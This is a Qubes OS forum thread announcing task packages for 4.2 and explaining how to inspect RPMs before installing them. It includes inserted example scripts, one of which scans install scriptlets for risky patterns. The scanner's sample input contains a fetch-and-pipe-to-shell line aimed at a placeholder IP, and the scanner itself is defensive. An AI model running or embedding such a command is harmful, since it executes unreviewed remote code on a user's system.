Tool: Simple Set-up of New Qubes and Software

Cool work. As a new Linux user, the biggest hurdle by far is all the terminal work. Luckily I already have a foundation under me of HTML/CSS etc., so using script and learning it isn’t an automatic mind fk. However, for most people it will be; the biggest hurdle to get a lot more people on Linux is making ALL the normal day-to-day functions people may want to do easily done through a GUI. I know the Linux community likely isn’t as focused on that, as using the terminal etc. is part of the networking/management fun of Linux. Hopefully one day Linux will be the gamer OS of choice (thanks to Steam and Proton, that reality is coming faster than it was), but even SteamOS takes more than a lot of normal people are willing to invest into an OS even just for games. Forums are full of people who switched to Windows devices because they “couldn’t figure it out”, and that’s only a small handful of stuff to learn in a very niche use case. When it comes to a full everyday-use Linux OS, the amount of stuff is quite daunting. I’m not sure if a full GUI OS would be something that would be suitable for Qubes or not, as I don’t know how much vulnerability is added by all the extra code/modifications for the interfaces and how it would affect the attack surface, but it sure would be nice!

@unman any status on this for our QubesOS users?

I haven’t announced it yet, but the repo for 4.2 is well populated
already. Perhaps this is the announcement.
I’ll post something more detailed once I’ve finished the Mullvad
packages.

3 Likes

Great work as always, @unman
I’m working out of the new 4.2 repo and all debian-based templates work when using the cacher salt configs.

Fedora templates, however, issue Curl errors (5), (500), and (56). I think somewhere I read you suggested changing the repository metalinks or alternating to the baseurls instead? I can’t find the source of that post now.

EDIT:

Found this in an old email list exchange, for anyone looking to troubleshoot apt-cacher-ng:

Yes, apt-cacher-ng works for Fedora updates.

You have to make some changes -
First, on the client side, comment out “metalink” lines, and uncomment
“baseurl” lines. This is because the metalink will keep loading new
https:// repositories, and apt-cacher-ng can’t cache those requests,
as you know.
Second, watch the caches in /var/cache/apt-cacher-ng , and add any new
ones to the fedora_mirrors file - this is because that file doesn’t
contain all Fedora repositories.

After a while you will have almost all your Fedora updates cached, and
will see the speed increase.
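The client-side change described in the quoted mailing-list reply, as an added example that is not part of the original posts. It assumes the usual dnf `.repo` layout; the function names, mirror hostnames and sample file are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): switch a dnf .repo file from
# metalink to baseurl so updates come from one fixed, cacheable mirror URL.

# Print the rewritten file to stdout; the input file is left untouched.
switch_to_baseurl() {
    sed -e 's/^metalink=/#metalink=/' \
        -e 's/^#[[:space:]]*baseurl=/baseurl=/' "$1"
}

# Name every section that would have no baseurl after the rewrite; such a
# repo would lose its only source once its metalink is commented out.
sections_without_baseurl() {
    switch_to_baseurl "$1" | awk '
        /^\[/ { if (name != "" && !has) print name; name = $0; has = 0; next }
        /^baseurl=/ { has = 1 }
        END { if (name != "" && !has) print name }'
}

# Constructed sample in the layout of /etc/yum.repos.d/*.repo files.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
[fedora]
name=Fedora $releasever - $basearch
#baseurl=http://mirror.example/fedora/releases/$releasever/Everything/$basearch/os/
metalink=https://mirrors.example/metalink?repo=fedora-$releasever&arch=$basearch
enabled=1

[constructed-nobase]
name=Repo that ships only a metalink
metalink=https://mirrors.example/metalink?repo=other
enabled=1
EOF

switch_to_baseurl "$SAMPLE"
echo "sections left without a baseurl:"
sections_without_baseurl "$SAMPLE"
```

Diff the output against the original file before replacing it in the template, and give any section the second function names a baseurl by hand.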

I’m finally announcing that tasks are available for 4.2.
You can read details here

These are packages that you can install which will create and configure
templates and qubes for specific purposes. All are based on debian-12
templates, usually the minimal template.

There’s a CLI and the same ugly GUI. I recommend running the GUI because
these tools are supposed to take away the reliance on command line use
in dom0. (It also has the advantage of giving some feedback while the
templates are installed and configured.)

What’s here?

Among the task packages so far:

  • cacher - a caching proxy. If you clone a template this will cache the downloaded packages on updates, to reduce the bandwidth/time pain of having multiple templates trying to grab the same packages.
  • pihole - installs and configures a pihole qube, which helps to block advertisements and internet trackers
  • syncthing - a syncthing qube, and a syncthing service. You can syncthing files between qubes and/or use syncthing with external machines.
  • multimedia - creates a media qube which is intended to store media files, and an associated disposable multimedia qube to play the files. So you can (relatively) safely download stuff and store it in media, while viewing or using in the disposable.
  • Mullvad - thanks to the good folk at Mullvad, creates a sys-mullvad qube where you can configure the VPN for use in attached qubes. Also creates a disposable template so you can use disposables with the Mullvad browser, and/or use a VPN just in that disposable.
  • Proton VPN - a qube to use Proton VPN
  • sys-vpn - a service qube to help configure an OpenVPN connection for use by attached qubes.
  • reader - creates a template with software aimed at terminal users, like conversion to plain text, edbrowse, and orca.
  • mirage-firewall - installs the latest release of the unikernel mirage firewall, warts and all.
  • split-git
  • split-gpg

Source?

The source is on GitHub.
For the most part these packages install and run salt states. The states are deliberately simple to read so almost anyone will be able to understand what they do.

Why should I trust this?

Don’t. At least, not without some careful thought.
All the packages are signed with my Qubes signing key.
All the code is available, and anyone can review it.

If you want to check what a particular package really does:

  1. Download the package without installing it.
  2. rpm2cpio PACKAGE_NAME |cpio -id will extract the directories and files from the package, so you can inspect them.
  3. rpm -qi --scripts PACKAGE_NAME will show you exactly what scripts will be run on installation.

Suggestions, changes, or improvements?

Post in this thread with suggestions for new packages or changes to the existing ones.
Most of these packages have been created to other user specifications.

Bugs?

Please don’t post them here.
Open a new thread with details of the problem. It’s easier to see the problem, and other users will be able to find the problem, and (I hope), the answer, more easily.

If the formatting here is off, can someone fix it for me?

unman

8 Likes
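Steps 2 and 3 of the package check above as a script, with a scan of the scriptlet text for lines worth reading closely; this is an added example, not unman's code. The function names, the pattern list and the sample scriptlet text are constructed, and `-p` is used so that rpm queries the downloaded file rather than the installed-package database.

```shell
#!/bin/sh
# Added example (not from the thread): review an RPM before installing it.

# Read `rpm -qp --scripts` output on stdin and print "section: line" for
# scriptlet lines that fetch from the network, pipe into a shell, or touch
# sudo or qrexec policy files. The pattern list is a constructed start.
flag_scriptlets() {
    awk '
        /scriptlet \(using / { section = $1; next }
        section != "" && /(curl|wget)[ \t]|[|][ \t]*(ba)?sh|\/etc\/sudoers|\/etc\/qubes\/policy\.d|\/etc\/qubes-rpc/ {
            print section ": " $0
        }'
}

# Check signature, unpack into a scratch directory, then scan the scriptlets.
review_rpm() {
    pkg=$1
    dest=$(mktemp -d) || return 1
    # Digest and signature check against the keys imported into rpm.
    rpm -K "$pkg" || return 1
    rpm2cpio "$pkg" | (cd "$dest" && cpio -id) || return 1
    echo "files extracted to $dest"
    rpm -qp --scripts "$pkg" | flag_scriptlets
}

# Constructed scriptlet text in the format rpm prints; not from a real package.
SAMPLE_SCRIPTS='postinstall scriptlet (using /bin/sh):
if [ $1 -eq 1 ]; then
  qubesctl state.apply example.create
  curl http://203.0.113.5/setup.sh | sh
fi
preuninstall scriptlet (using /bin/sh):
rm -f /etc/qubes/policy.d/30-example.policy'

# With a package file as argument, review it; otherwise scan the sample.
if [ -n "${1:-}" ]; then
    review_rpm "$1"
else
    printf '%s\n' "$SAMPLE_SCRIPTS" | flag_scriptlets
fi
```

A flagged line is a prompt to read that scriptlet in full; a task package that sets up policy will legitimately touch the policy directory.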

Should have included obligatory sig.

Wishing now that your Qubes Tasks could somehow merge with qusal

After all the conversations on backing up one’s system, I’ve finally understood the necessity of salting all my qubes. Qubes Tasks is a great step toward understanding that.

1 Like